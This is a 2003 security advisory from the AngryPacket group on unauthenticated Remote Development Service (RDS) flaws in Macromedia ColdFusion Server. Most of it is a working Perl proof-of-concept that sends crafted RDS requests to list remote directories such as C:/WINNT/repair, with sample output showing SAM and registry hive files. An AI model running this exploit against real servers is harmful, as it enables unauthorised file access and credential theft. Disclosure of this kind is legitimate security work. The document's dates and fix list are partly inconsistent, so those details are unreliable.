The ColdFusion Server versions 4.5 and 5 suffer from multiple vulnerabilities. They range from the default RDS password being blank by default to allowing a normal remote user to reconfigure their website properties to put and get any file on the server.
faa0a31742d24a814cbf24ab9f645633cf615b253c7800154079460c4cdc420b
- -- ------------------------- -- -
[>(] AngryPacket Security Advisory [>(]
- -- ------------------------- -- -
+--------------------- -- -
+ advisory information
+------------------ -- -
Exploit Code: Victim1 <victim1@angrypacket.com>
Initial Bug Report By: rs2112 <rs2112@hushmail.com>
release date: 06/26/2003
+------------------- -- -
+ timeline of Vendor Notification
+------------------- -- -
1: Initial Email - Remote RDS problem and sample runtime exploit code
-> Sun Jun 29 18:30:21 CDT 2003
1a: Status: (mon) No Response
2: Call Macromedia - Get treated like a peckerhead and no one cares.. .
-> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time.
2a: Next day ( tues ).. .. No one responds.. .. Oh well Post code.
+-------------------- -- -
+ product information
+----------------- -- -
software: Cold Fusion server
vendor: Macromedia
homepage: https://www.macromedia.com
description:
With ColdFusion MX, you can build and deploy powerful web applications and web
services with far less training time and fewer lines of code than ASP, PHP, and
JSP. Now available in versions that support industry leading J2EE application
servers, ColdFusion MX enables web application developers to easily harness the
power of the Java platform.
+---------------------- -- -
+ vulnerability details
+------------------- -- -
problem1: Default Remote Development Service (RDS) configuration.( read, write, retrieve )
problem2: ASP SESSION ID's are not validated.
affected: Cold Fusion Server MX
explaination: ColdFusion RDS allows developers to securely access remote files
and data sources, and debug CFML code. Developers can use RDS through
ColdFusion Studio, Homesite+, and Dreamweaver MX to access files and databases
on a remote ColdFusion development server using HTTP. Under CF 4.5/5, RDS ran
as a service; under CFMX, RDS is a JAVA servlet that runs under the context of
the CF Application service account. In both cases, by default, RDS has
LocalSystem authority to the box. When properly configured, RDS requires a
(static) password to authenticate the remote developer. The first
vulnerability (1) is that, due to this level of access, a remote user can
reconfigure their website properties to access (put and get) any file on the CF
server. The second vulnerability (2) is that, by default, RDS does not require
a password for authentication (null password). Therefore, anyone with a RDS
compatible development application, can attach to a CF server running RDS,
authenticate with a blank password, and own the box. The third vulnerability
(3) is that when the RDS password is set, it is sent over the wire in clear
text.
risk: High
status: Awaiting vendor response. ( Read Timeline: Above )
exploit: As a proof of concept, victim1 has developed beta code that can
be used to exploit the RDS <blank> password vulnerability. The code
demonstrates that fact that it would be a trivial task to scan the Internet,
determine which servers are running CF, and compromise the box.
fix: Vulnerability 1 - use a dedicated service account with restricted access to the server.
Vulnerability 2 - set the d*mn password
Vulnerability 3 - ASP SESSION ID not validated.
Vulnerability 4 - ??
+-------- -- -
+ credits
+----- -- -
Vulnerability reported by rs2112.
Exploit code developed by Victim1 of AngryPacket Security group.
+--------------
+ exploit:
+-------------
#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com
## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN,
# I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and thats it.
## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection just FYI,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to and *.exe it will attempt to become and
# 16bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certian current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically dont bother.
#
# Im sorry for being such a foil fart but hey, you understand im shure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use IO::Socket;
use vars qw($response @clength @rarray);
## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
"Content-Length: 28",
"Content-Length: 47",
"Content-Length: 46",
#"Content-Length: 32",
#"Content-Length: 50",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 24",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 29",
"Content-Length: 46",
"Content-Length: 37"
);
@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:7:C:/_mm/STR:1:*STR:0:",
"3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
#"3:STR:10:C:/_notes/STR:1:*STR:0:",
#"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:3:C:/STR:1:*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++ ) {
for ( $c = 0; $c < @clength; $c++ ) {
if( $i == $c ) {
&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
}
}
}
sub gen_sock() {
my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
PeerPort => $PORT,
Proto => 'tcp',
);
die "Socket Could not be established ! $!" unless $sock;
print "Target: $TARGET:$PORT\n";
print "$POST\n";
print "Request String Value: $rarray[$i]\n";
print "$clength[$c]\n";
print "Please wait.. ..\n";
print $sock "$POST";
print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
print $sock "Host: $TARGET\r\n";
print $sock "$clength[$c]\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
print $sock "\r\n";
print $sock "$rarray[$i]";
# lets return and print data to term
while($response = <$sock>) {
chomp($response);
print "$response\n";
}
close($sock);
}
+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.
Oh and Happy 4th of July !
- -- -------------------------
#EOT